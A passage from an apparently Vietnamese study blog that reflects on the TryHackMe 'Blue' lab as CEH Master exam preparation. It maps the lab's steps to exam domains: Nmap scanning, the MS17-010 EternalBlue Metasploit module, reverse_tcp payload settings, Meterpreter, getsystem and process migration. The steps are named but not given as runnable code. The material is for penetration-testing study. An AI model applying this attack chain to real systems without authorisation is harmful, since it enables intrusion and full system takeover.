Lab BLUE một lần nữa khẳng định rằng giai đoạn thu thập thông tin, đặc biệt là việc sử dụng Nmap để quét cổng và dịch vụ một cách kỹ lưỡng, là bước đầu tiên và có vai trò quyết định trong việc xác định vector tấn công. Một lỗi nhỏ hoặc sự thiếu sót trong giai đoạn này có thể dẫn đến việc bỏ lỡ lỗ hổng và đi sai hướng. Trong kỳ thi CEH Master, các mục tiêu có thể phức tạp hơn nhiều, đòi hỏi thí sinh phải thành thạo việc sử dụng nhiều công cụ và kỹ thuật thu thập thông tin khác nhau, bao gồm cả active reconnaissance (như quét cổng) và passive reconnaissance (như thu thập thông tin từ các nguồn mở). Các domain như “Footprinting and Reconnaissance”, “Scanning Networks”, và “Enumeration” đều là những phần quan trọng trong chương trình học CEH. - Hiểu biết về các lỗ hổng phổ biến và cách chúng được khai thác:
Lỗ hổng MS17-010 (EternalBlue) được khai thác trong lab BLUE là một ví dụ điển hình về một lỗ hổng nghiêm trọng, đã từng được sử dụng trong nhiều cuộc tấn công ransomware quy mô lớn trên toàn cầu. Việc hiểu rõ cơ chế hoạt động của nó (liên quan đến lỗi trong cách xử lý của giao thức SMB) và quy trình khai thác bằng Metasploit là một phần kiến thức nền tảng quan trọng. Kỳ thi CEH Master sẽ kiểm tra kiến thức và kỹ năng của thí sinh đối với nhiều loại lỗ hổng khác nhau, không chỉ giới hạn ở các lỗ hổng dịch vụ mạng mà còn bao gồm cả lỗ hổng ứng dụng web, lỗi cấu hình, v.v. - Quy trình và các kỹ thuật leo thang đặc quyền trên hệ thống Windows:
Lab BLUE minh họa các bước cơ bản trong quy trình leo thang đặc quyền trên một hệ thống Windows: từ việc có được một shell với quyền hạn thấp, nâng cấp lên Meterpreter để có nhiều tính năng hơn, sau đó sử dụng các lệnh như getsystem và kỹ thuật di chuyển tiến trình (migrate) để đạt được và duy trì quyền quản trị cao nhất. Kỳ thi CEH Master đòi hỏi thí sinh phải có hiểu biết sâu sắc hơn về các kỹ thuật leo thang đặc quyền khác nhau, bao gồm việc khai thác các lỗi cấu hình sai (misconfigurations), tìm kiếm và sử dụng mật khẩu yếu, hoặc khai thác các lỗ hổng kernel chưa được vá lỗi. Domain “System Hacking” trong CEH bao gồm một phần quan trọng về leo thang đặc quyền. - Thực hành sử dụng thành thạo các công cụ thiết yếu như Nmap và Metasploit:
Nmap và Metasploit Framework là hai trong số những công cụ không thể thiếu của một chuyên gia kiểm thử xâm nhập (ethical hacker). Lab BLUE cung cấp một cơ hội tốt để thực hành các lệnh cơ bản và làm quen với quy trình làm việc tiêu chuẩn với hai công cụ này. Tuy nhiên, kỳ thi CEH Master yêu cầu sự thành thạo ở mức độ cao hơn, không chỉ dừng lại ở việc biết các lệnh cơ bản mà còn phải hiểu rõ các tùy chọn nâng cao, cách lựa chọn và tùy biến các module khác nhau của Metasploit, cũng như khả năng phân tích kết quả Nmap một cách nhanh chóng và chính xác để đưa ra quyết định tấn công phù hợp. - Cách lab này phản ánh các kịch bản thực tế trong bài thi CEH Master:
Mặc dù được đánh giá là một lab ở mức độ cơ bản, BLUE mô phỏng một chuỗi tấn công hoàn chỉnh: từ quét mạng, tìm lỗ hổng, khai thác lỗ hổng đó để giành quyền truy cập ban đầu, và cuối cùng là leo thang đặc quyền để kiểm soát hoàn toàn hệ thống. Đây là cấu trúc chung của nhiều thử thách mà thí sinh sẽ gặp phải trong kỳ thi CEH Master, nơi họ được đặt vào một môi trường mạng doanh nghiệp giả lập với nhiều hệ thống và ứng dụng khác nhau.
Kỳ thi CEH Master không phải là một tập hợp các câu hỏi trắc nghiệm lý thuyết, mà là một loạt các thử thách thực hành, đòi hỏi thí sinh phải tự mình thực hiện các bước tấn công. Lab BLUE, dù ở mức độ cơ bản, giúp xây dựng một phương pháp luận tấn công có hệ thống. Khi đối mặt với một máy chủ chưa biết trong kỳ thi, thí sinh có thể áp dụng một quy trình tương tự: bắt đầu bằng việc thu thập thông tin kỹ lưỡng (ví dụ, bằng Nmap), phân tích kết quả để tìm ra các điểm yếu tiềm năng, tìm kiếm và cấu hình exploit phù hợp, cố gắng giành quyền truy cập, và sau đó tìm cách leo thang đặc quyền nếu cần. Sự khác biệt chính giữa lab BLUE và các thử thách trong CEH Master sẽ nằm ở độ phức tạp của các lỗ hổng, sự đa dạng của các hệ thống mục tiêu, và các biện pháp phòng thủ có thể được triển khai. Việc lặp đi lặp lại quy trình tấn công này trên các phòng lab khác nhau, với độ khó tăng dần, sẽ giúp thí sinh nội hóa phương pháp luận này, làm cho nó trở thành một phản xạ tự nhiên, ngay cả khi làm việc dưới áp lực cao của môi trường thi cử.
Bảng Ánh xạ Hoạt động Lab BLUE với Các Domain của CEH Master
Bảng sau đây giúp liên kết trực tiếp các hoạt động cụ thể được thực hiện trong lab BLUE với các lĩnh vực kiến thức và kỹ năng (domains) được kiểm tra trong kỳ thi CEH Master. Điều này giúp người học thấy rõ sự liên quan và giá trị của việc thực hành lab này đối với mục tiêu thi cử của họ.
| Hoạt động trong Lab BLUE (Activity in BLUE Lab) | Domain CEH Master Tương ứng (Corresponding CEH Master Domain) | Công cụ/Kỹ thuật Chính (Key Tool/Technique) |
| Quét cổng, dịch vụ, phiên bản OS bằng Nmap | Scanning Networks; Vulnerability Analysis; OS Detection | Nmap (-sV, -sC, -p-, OS detection scripts) |
| Xác định lỗ hổng MS17-010 từ kết quả quét | Vulnerability Analysis; Threat Vector Identification | Phân tích kết quả Nmap, kiến thức về các lỗ hổng phổ biến (MS17-010) |
| Tìm kiếm và chọn module MS17-010 trong Metasploit | System Hacking; Vulnerability Analysis | Metasploit Framework (search command, use command) |
| Cấu hình RHOSTS, LHOST, Payload (ví dụ: windows/x64/shell/reverse_tcp) | System Hacking | Metasploit Framework (set RHOSTS, set LHOST, set PAYLOAD commands) |
| Thực thi exploit để giành quyền truy cập shell ban đầu | System Hacking | Metasploit Framework (exploit or run command) |
| Nâng cấp shell cơ bản lên Meterpreter session | System Hacking | Metasploit Framework (ví dụ: post/multi/manage/shell_to_meterpreter) |
| Leo thang đặc quyền lên NT AUTHORITY\SYSTEM | System Hacking (Privilege Escalation) | Meterpreter (getsystem command, other privilege escalation techniques) |
| Di chuyển tiến trình (Process Migration) để duy trì truy cập | System Hacking (Covering Tracks / Maintaining Access) | Meterpreter (ps command, migrate command) |
Việc hiểu rõ mối liên hệ này sẽ củng cố niềm tin rằng thời gian đầu tư vào việc thực hành các lab, ngay cả những lab cơ bản, cũng đóng góp một cách thiết thực vào việc chuẩn bị cho một kỳ thi nâng cao hơn bằng cách xây dựng và củng cố các kỹ năng nền tảng trong các domain cụ thể được kiểm tra.
V. Khuyến cáo Dành cho Thí sinh CEH Master
Để chuẩn bị tốt nhất cho kỳ thi CEH Master, việc hoàn thành lab BLUE chỉ là một bước khởi đầu. Dưới đây là một số khuyến cáo quan trọng:
- Tăng cường thực hành trên nhiều lab và các thử thách Capture The Flag (CTF) khác nhau để đa dạng hóa kinh nghiệm:
Lab BLUE là một điểm xuất phát tốt, nhưng thế giới an ninh mạng rất rộng lớn. Hãy chủ động tìm kiếm và thực hành trên nhiều phòng lab khác nhau từ các nền tảng như TryHackMe (ngoài BLUE), VulnHub, Hack The Box, và các nguồn tài liệu khác. Mỗi lab thường tập trung vào các hệ điều hành, dịch vụ, ứng dụng và loại lỗ hổng khác nhau. Kỳ thi CEH Master bao gồm 20 thử thách đa dạng, vì vậy kinh nghiệm thực hành càng rộng và phong phú thì khả năng ứng phó với các tình huống bất ngờ càng cao. - Nắm vững các khái niệm cốt lõi đằng sau các công cụ và kỹ thuật, không chỉ học vẹt lệnh:
Điều quan trọng không chỉ là biết cách gõ một lệnh mà còn là hiểu tại sao lệnh đó hoạt động, tại sao một exploit cụ thể lại thành công, tại sao một payload cụ thể được chọn, và các kỹ thuật leo thang đặc quyền khác nhau dựa trên những nguyên tắc nào. Sự hiểu biết sâu sắc này sẽ giúp bạn trở nên linh hoạt và có khả năng ứng biến tốt hơn khi gặp phải các tình huống không hoàn toàn giống với những gì đã thực hành. - Phát triển kỹ năng giải quyết vấn đề và tư duy phân tích trong điều kiện áp lực thời gian:
Kỳ thi CEH Master kéo dài 6 giờ liên tục. Đây là một khoảng thời gian dài nhưng cũng rất dễ trôi qua nhanh chóng nếu không quản lý tốt. Hãy tập làm quen với việc làm việc hiệu quả dưới áp lực. Khi gặp bế tắc trong một thử thách, hãy học cách suy nghĩ một cách có hệ thống, thử các hướng tiếp cận khác nhau, ghi chú lại những gì đã thử và kết quả, và quan trọng nhất là quản lý thời gian một cách hiệu quả để không bị sa lầy quá lâu vào một vấn đề. - Luôn cập nhật kiến thức về các mối đe dọa, lỗ hổng và công cụ mới nhất trong lĩnh vực an ninh mạng:
An ninh mạng là một lĩnh vực thay đổi cực kỳ nhanh chóng. Các lỗ hổng mới được phát hiện hàng ngày, các kỹ thuật tấn công mới được phát triển, và các công cụ mới cũng liên tục ra đời. Việc theo dõi các blog chuyên ngành, tham gia các hội thảo, diễn đàn trực tuyến và các cộng đồng an ninh mạng sẽ giúp bạn luôn cập nhật được những thông tin mới nhất. - Mô phỏng điều kiện thi bằng cách tự đặt giới hạn thời gian khi thực hành lab:
Khi thực hành trên các phòng lab hoặc CTF, hãy thử tự đặt ra giới hạn thời gian cho mình để hoàn thành mục tiêu. Điều này giúp rèn luyện khả năng làm việc dưới áp lực và cải thiện tốc độ cũng như hiệu quả trong việc ra quyết định. - Tìm hiểu sâu về các domain được liệt kê trong yêu cầu của CEH Master:
Kỳ thi CEH Master kiểm tra một loạt các kỹ năng thực hành, bao gồm (nhưng không giới hạn) việc xác định vector tấn công, quét mạng, phát hiện hệ điều hành, phân tích lỗ hổng, tấn công hệ thống, tấn công ứng dụng web (bao gồm các lỗi như directory traversal, parameter tampering, Cross-Site Scripting – XSS), tấn công SQL injection, và các kỹ thuật tấn công liên quan đến mã hóa. Hãy đảm bảo rằng bạn có kiến thức lý thuyết vững chắc và kỹ năng thực hành tốt trong tất cả các lĩnh vực này.
Việc hoàn thành lab BLUE chỉ là một phần nhỏ trong một chiến lược học tập toàn diện cho CEH Master. Kỳ thi này đòi hỏi sự chuẩn bị kỹ lưỡng và một kế hoạch học tập dài hạn. Các khuyến nghị trên không chỉ dừng lại ở việc lặp lại các kỹ thuật trong một lab cụ thể mà còn bao gồm việc mở rộng kiến thức một cách liên tục, rèn luyện kỹ năng giải quyết vấn đề một cách sáng tạo, học cách quản lý thời gian hiệu quả, và không ngừng cập nhật những diễn biến mới nhất trong ngành. Việc xây dựng một kế hoạch học tập cá nhân, kết hợp nhiều loại tài nguyên và phương pháp học tập khác nhau, với trọng tâm là thực hành liên tục và có mục tiêu, sẽ là yếu tố then chốt. Tham gia vào các diễn đàn cộng đồng an ninh mạng cũng có thể mang lại nhiều lợi ích thông qua việc trao đổi kinh nghiệm và học hỏi từ những người khác.
Lời Kết
Việc thực hành trên lab BLUE của TryHackMe mang lại những kinh nghiệm quý báu, giúp củng cố kiến thức nền tảng và rèn luyện các kỹ năng thực hành cần thiết cho kỳ thi CEH Master. Từ việc làm quen với quy trình tấn công cơ bản, sử dụng các công cụ phổ biến như Nmap và Metasploit, đến việc hiểu rõ hơn về các khái niệm như thu thập thông tin, khai thác lỗ hổng và leo thang đặc quyền, tất cả đều đóng góp vào sự chuẩn bị toàn diện của thí sinh.
Tuy nhiên, cần nhớ rằng đây chỉ là một bước trong hành trình dài. Sự kiên trì, thực hành liên tục trên nhiều kịch bản đa dạng, và khả năng tư duy phê phán, phân tích vấn đề một cách độc lập mới là những yếu tố quyết định để chinh phục thành công chứng chỉ CEH Master đầy thử thách. Chúc các bạn học tập hiệu quả và đạt được kết quả cao nhất trên con đường sự nghiệp trong lĩnh vực an ninh mạng.





Bình luận về bài viết này